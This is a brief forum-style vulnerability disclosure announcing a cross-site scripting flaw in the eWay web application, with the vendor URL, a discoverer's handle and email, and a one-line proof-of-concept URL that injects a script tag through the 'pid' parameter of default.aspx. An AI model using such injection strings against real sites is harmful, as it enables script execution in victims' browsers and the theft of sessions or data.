eWay suffers from a cross site scripting flaw.
68e5cef611ac34292088eae37b7bbb98b404977121d26f4011f8db918b457bd4
hey guys .. check out this new xss i just found ;P
Vulnerable : eWay
web : http://www.eway.no/eway
XSS :
http://127.0.0.1/path/default.aspx?pid="><script>alert('bl4ck')</script>
Discovered By BLacK ZeRo
bL4ck@bsdmail.org
Best regards ,,